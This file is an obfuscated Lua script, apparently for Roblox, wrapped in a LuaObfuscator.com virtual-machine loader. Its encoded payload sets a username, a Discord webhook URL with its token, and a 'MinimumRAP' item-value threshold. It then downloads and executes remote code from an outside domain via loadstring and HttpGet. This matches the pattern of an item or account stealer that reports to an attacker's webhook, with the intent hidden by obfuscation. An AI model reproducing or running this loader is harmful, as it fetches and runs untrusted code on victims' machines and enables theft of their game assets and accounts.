--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33) if v33 then local v71=0 -0 ;local v72;while true do if ((0 -0)==v71) then v72=(v31/((3 -1)^(v32-(2 -1))))%(((885 -264) -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-(569 -((1432 -(68 + 997)) + 201)))) + ((2198 -(226 + 1044)) -(214 + 713)))) ;return v72-(v72%(1 + (0 -0))) ;end end else local v73=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v73 + v73))>=v73) and (1638 -(1523 + 114))) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24() local v34=117 -(32 + 85) ;local v35;local v36;local v37;local v38;while true do if (v34==(1 + 0)) then return (v38 * 16777216) + (v37 * (14533 + 51003)) + (v36 * ((1563 -(87 + 263)) -(892 + 65))) + v35 ;end if (0==v34) then v35,v36,v37,v38=v1(v16,v19,v19 + ((187 -(67 + 113)) -4) );v19=v19 + (6 -2) ;v34=1 -(0 + 0) ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29() local v39=0 -0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v39==0) then v40=1047 -(67 + 980) ;v41=nil;v39=1;end if (v39==(1477 -(1329 + 145))) then v46=nil;v47=nil;v39=4;end if (2==v39) then v44=nil;v45=nil;v39=974 -(140 + 831) ;end if (4==v39) then while true do if (v40==2) then local v98=0;while true do if (v98==(1850 -(1409 + 441))) then v45=nil;v46=nil;v98=1;end if (v98==1) then v40=3;break;end end end if (0==v40) then v41=718 -(15 + 703) ;v42=nil;v40=1 + 0 ;end if (v40==1) then local v99=438 -(262 + 176) ;while true do if (v99~=1) then else v40=2;break;end if ((1721 -(345 + 1376))~=v99) then else v43=nil;v44=nil;v99=689 -(198 + 490) ;end end end if (v40==3) then v47=nil;while true do if (v41~=0) then else local v106=0 -0 ;while true do if (v106==(0 -0)) then v42={};v43={};v106=1;end if (v106==(1208 -(696 + 510))) then v41=1 -0 ;break;end if (v106==1) then v44={};v45={v42,v43,nil,v44};v106=2;end end end if (v41~=(375 -(123 + 251))) then else local v107=0 -0 ;while true do if (v107==2) then v41=2;break;end if (v107~=1) then else for v111=699 -(208 + 490) ,v46 do local v112=0;local v113;local v114;local v115;while true do if (v112~=0) then else v113=0 + 0 ;v114=nil;v112=1 + 0 ;end if (v112~=(837 -(660 + 176))) then else v115=nil;while true do if (v113==0) then v114=v22();v115=nil;v113=1;end if (v113==1) then if (v114==(1 + 0)) then v115=v22()~=(202 -(14 + 188)) ;elseif (v114==2) then v115=v25();elseif (v114~=(678 -(534 + 141))) then else v115=v26();end v47[v111]=v115;break;end end break;end end end v45[2 + 1 ]=v22();v107=2 + 0 ;end if (v107~=(0 + 0)) then else v46=v24();v47={};v107=1 -0 ;end end end if (v41==2) then local v108=0;while true do local v109=0 -0 ;while true do if ((0 -0)==v109) then if (v108~=1) then else return v45;end if (v108==(0 + 0)) then local v129=0;while true do if (v129~=(0 + 0)) then else for v166=1,v24() do local v167=396 -(115 + 281) ;local v168;local v169;while true do if ((2 -1)==v167) then while true do if (v168==(0 + 0)) then v169=v22();if (v21(v169,2 -1 ,1)~=0) then else local v176=0;local v177;local v178;local v179;local v180;local v181;while true do if (v176~=(7 -5)) then else v181=nil;while true do if (v177==0) then local v182=867 -(550 + 317) ;while true do if (v182~=(0 -0)) then else v178=0 -0 ;v179=nil;v182=2 -1 ;end if (v182~=1) then else v177=286 -(134 + 151) ;break;end end end if (v177==(1666 -(970 + 695))) then local v183=0;while true do if (v183==1) then v177=2;break;end if (v183==0) then v180=nil;v181=nil;v183=1;end end end if (v177==2) then while true do if (v178==(0 -0)) then local v184=0;local v185;while true do if (v184~=(1990 -(582 + 1408))) then else v185=0;while true do if ((0 -0)==v185) then local v194=0;local v195;while true do if (v194~=0) then else v195=0 -0 ;while true do if (v195~=(0 -0)) then else v179=v21(v169,1826 -(1195 + 629) ,3 -0 );v180=v21(v169,245 -(187 + 54) ,786 -(162 + 618) );v195=1 + 0 ;end if (v195==1) then v185=1;break;end end break;end end end if (v185==(1 + 0)) then v178=1;break;end end break;end end end if (v178~=2) then else local v186=0 -0 ;local v187;while true do if (v186~=0) then else v187=0 -0 ;while true do if (v187==(0 + 0)) then local v196=1636 -(1373 + 263) ;while true do if (1==v196) then v187=1;break;end if (v196==0) then if (v21(v180,1001 -(451 + 549) ,1 + 0 )==(1 -0)) then v181[2 -0 ]=v47[v181[1386 -(746 + 638) ]];end if (v21(v180,2,1 + 1 )~=1) then else v181[4 -1 ]=v47[v181[344 -(218 + 123) ]];end v196=1582 -(1535 + 46) ;end end end if (v187~=(1 + 0)) then else v178=1 + 2 ;break;end end break;end end end if (v178==(561 -(306 + 254))) then local v188=0;while true do if (v188~=1) then else v178=1 + 1 ;break;end if (v188==0) then local v192=0 -0 ;local v193;while true do if (v192==(1467 -(899 + 568))) then v193=0;while true do if (v193~=(1 + 0)) then else v188=2 -1 ;break;end if (v193==0) then v181={v23(),v23(),nil,nil};if (v179==0) then local v201=0;local v202;while true do if (v201~=0) then else v202=0;while true do if (v202~=0) then else v181[1 + 2 ]=v23();v181[4]=v23();break;end end break;end end elseif (v179==(1457 -(282 + 1174))) then v181[814 -(569 + 242) ]=v24();elseif (v179==2) then v181[8 -5 ]=v24() -(2^16) ;elseif (v179~=3) then else local v207=0 + 0 ;local v208;while true do if (v207==(1024 -(706 + 318))) then v208=0;while true do if (v208==0) then v181[1254 -(721 + 530) ]=v24() -((1273 -(945 + 326))^(39 -23)) ;v181[4]=v23();break;end end break;end end end v193=1;end end break;end end end end end if (v178==3) then if (v21(v180,3 + 0 ,703 -(271 + 429) )==1) then v181[4 + 0 ]=v47[v181[4]];end v42[v166]=v181;break;end end break;end end break;end if (1==v176) then v179=nil;v180=nil;v176=1502 -(1408 + 92) ;end if (0==v176) then v177=1086 -(461 + 625) ;v178=nil;v176=1;end end end break;end end break;end if (v167==0) then v168=0;v169=nil;v167=1;end end end for v170=1289 -(993 + 295) ,v24() do v43[v170-(1 + 0) ]=v29();end v129=1172 -(418 + 753) ;end if (v129~=1) then else v108=1;break;end end end break;end end end end end break;end end break;end if (v39~=1) then else v42=nil;v43=nil;v39=1 + 1 ;end end end v30=nil;v18=7;end if (v18==4) then function v25() local v48=v24();local v49=v24();local v50=1;local v51=(v21(v49,1 + 0 ,6 + 14 ) * (((321 -(53 + 267)) + 1)^(70 -38))) + v48 ;local v52=v21(v49,550 -(406 + 123) ,1800 -(1749 + 20) );local v53=((v21(v49,8 + 24 )==(1323 -(1249 + 73))) and  -(1 + 0)) or 1 ;if (v52==(0 + 0)) then if (v51==(1145 -(466 + 154 + 525))) then return v53 * ((413 -(15 + 398)) -0) ;else local v79=(982 -(18 + 964)) -0 ;while true do if (v79==0) then v52=1901 -(106 + 1794) ;v50=0 + (0 -0) ;break;end end end elseif (v52==(518 + 1529)) then return ((v51==(0 -0)) and (v53 * (((2 + 1) -2)/(0 -0)))) or (v53 * NaN) ;end return v8(v53,v52-((717 + 420) -(4 + 110)) ) * (v50 + (v51/((5 -3)^(636 -(57 + 527))))) ;end v26=nil;function v26(v54) local v55;if  not v54 then local v74=850 -(20 + 830) ;while true do if (v74==(0 + 0)) then v54=v24();if (v54==(0 + 0)) then return "";end break;end end end v55=v3(v16,v19,(v19 + v54) -((1 + 0) -0) );v19=v19 + v54 ;local v56={};for v69=1 + 0 , #v55 do v56[v69]=v2(v1(v3(v55,v69,v69)));end return v6(v56);end v18=5;end if (v18==2) then function v22() local v57=0 + 0 ;local v58;while true do if (v57==(0 -0)) then v58=v1(v16,v19,v19);v19=v19 + (2 -1) ;v57=1552 -(1126 + 425) ;end if (v57==1) then return v58;end end end v23=nil;function v23() local v59,v60=v1(v16,v19,v19 + 2 );v19=v19 + (407 -(118 + 287)) ;return (v60 * (1003 -747)) + v59 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61) if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v75=v2(v0(v61,16));if v20 then local v80=0;local v81;while true do if (v80==0) then v81=v5(v75,v20);v20=nil;v80=1;end if (v80==1) then return v81;end end else return v75;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64) local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...) local v82=v66;local v83=v67;local v84=v68;local v85=v28;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do local v97=0;while true do if (v97==1) then if (v95<=4) then if (v95<=1) then if (v95==0) then local v116=0;local v117;local v118;local v119;local v120;local v121;while true do if (v116==5) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]();v86=v86 + 1 ;v94=v82[v86];v116=6;end if (v116==0) then v117=nil;v118,v119=nil;v120=nil;v121=nil;v92[v94[2]]=v64[v94[3]];v116=1;end if (v116==4) then for v163=v121,v87 do local v164=0;while true do if (v164==0) then v117=v117 + 1 ;v92[v163]=v118[v117];break;end end end v86=v86 + 1 ;v94=v82[v86];v121=v94[2];v92[v121]=v92[v121](v13(v92,v121 + 1 ,v87));v116=5;end if (v116==3) then v94=v82[v86];v121=v94[2];v118,v119=v85(v92[v121](v13(v92,v121 + 1 ,v94[3])));v87=(v119 + v121) -1 ;v117=0;v116=4;end if (v116==2) then v92[v121]=v120[v94[4]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];v86=v86 + 1 ;v116=3;end if (v116==6) then v86=v94[3];break;end if (v116==1) then v86=v86 + 1 ;v94=v82[v86];v121=v94[2];v120=v92[v94[3]];v92[v121 + 1 ]=v120;v116=2;end end else v86=v94[3];end elseif (v95<=2) then v92[v94[2]]=v94[3];elseif (v95==3) then do return;end else v92[v94[2]]();end elseif (v95<=7) then if (v95<=5) then if (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end elseif (v95==6) then v64[v94[3]]=v92[v94[2]];else v92[v94[2]]=v64[v94[3]];end elseif (v95<=8) then local v125=v94[2];local v126,v127=v85(v92[v125](v13(v92,v125 + 1 ,v94[3])));v87=(v127 + v125) -1 ;local v128=0;for v130=v125,v87 do v128=v128 + 1 ;v92[v130]=v126[v128];end elseif (v95>9) then local v138=0;local v139;while true do if (0==v138) then v139=v94[2];v92[v139]=v92[v139](v13(v92,v139 + 1 ,v87));break;end end else local v140=v94[2];local v141=v92[v94[3]];v92[v140 + 1 ]=v141;v92[v140]=v141[v94[4]];end v86=v86 + 1 ;break;end if (v97==0) then v94=v82[v86];v95=v94[1];v97=1;end end end end;end if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end end end return v30(v29(),{},v17)(...);end end end return v15("LOL!0E3O00028O0003083O00557365726E616D65030D3O004D6178596F7475626547414D4503093O00557365726E616D6532026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313233393539373137383034313932353735342F7438572O44474C36376A4B4E5644785975483341474E3143754462566E646947587A516A67585138675161447747653536437130337059347150786E75622D5A6D717252030A3O004D696E696D756D524150025O00408F40027O0040030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403173O00682O7470733A2O2F65676F72696B7573612E7370616365001B3O0012023O00013O0026053O0008000100010004013O00080001001202000100033O001206000100023O001202000100033O001206000100043O0012023O00053O0026053O000F000100050004013O000F0001001202000100073O001206000100063O001202000100093O001206000100083O0012023O000A3O0026053O00010001000A0004013O000100010012070001000B3O00122O0002000C3O00202O00020002000D00122O0004000E6O000200046O00013O00024O00010001000100044O001A00010004013O000100012O00033O00017O00",v9(),...);
